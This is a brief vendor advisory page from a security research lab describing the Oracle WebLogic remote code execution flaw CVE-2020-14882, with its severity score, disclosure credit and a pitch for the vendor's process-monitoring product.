CVE-2020-14882 WebLogic RCE Via GET Request
Virsec Security Research Lab Vulnerability Analysis
The Virsec Security Research Lab provides detailed analysis on recent and notable security vulnerabilities.
An OS Command Injection vulnerability exists in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). This easily exploitable vulnerability allows an unauthenticated attacker with HTTP based network access to compromise the Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
Watch the video to learn more about this and other important vulnerabilities.
The CVSS Base Score is 9.8 (Critical)
The vulnerable Oracle WebLogic Affected Versions
This was disclosed by security researcher Voidfyoo from Chaitin Security Research Lab.
Public domain exploit exists for this vulnerability. Oracle WebLogic Server is a Java EE application server currently developed by Oracle Corporation. Oracle acquired WebLogic Server when it purchased BEA Systems in 2008.
Any exploit of this vulnerabilities could lead to exposure of all sensitive data that resides on the server via backdoor which could be doing data exfiltration to CnC server.
Virsec Security Platform (VSP) Support
The Virsec Security Platform (VSP)-Host monitors processes that are spawned which are not part of a set of whitelisted process. Any attempt to execute new command or unknown binary would be denied by VSP-Host’s Process Monitoring capability.
Download the full vulnerability report to learn more about this and other important vulnerabilities.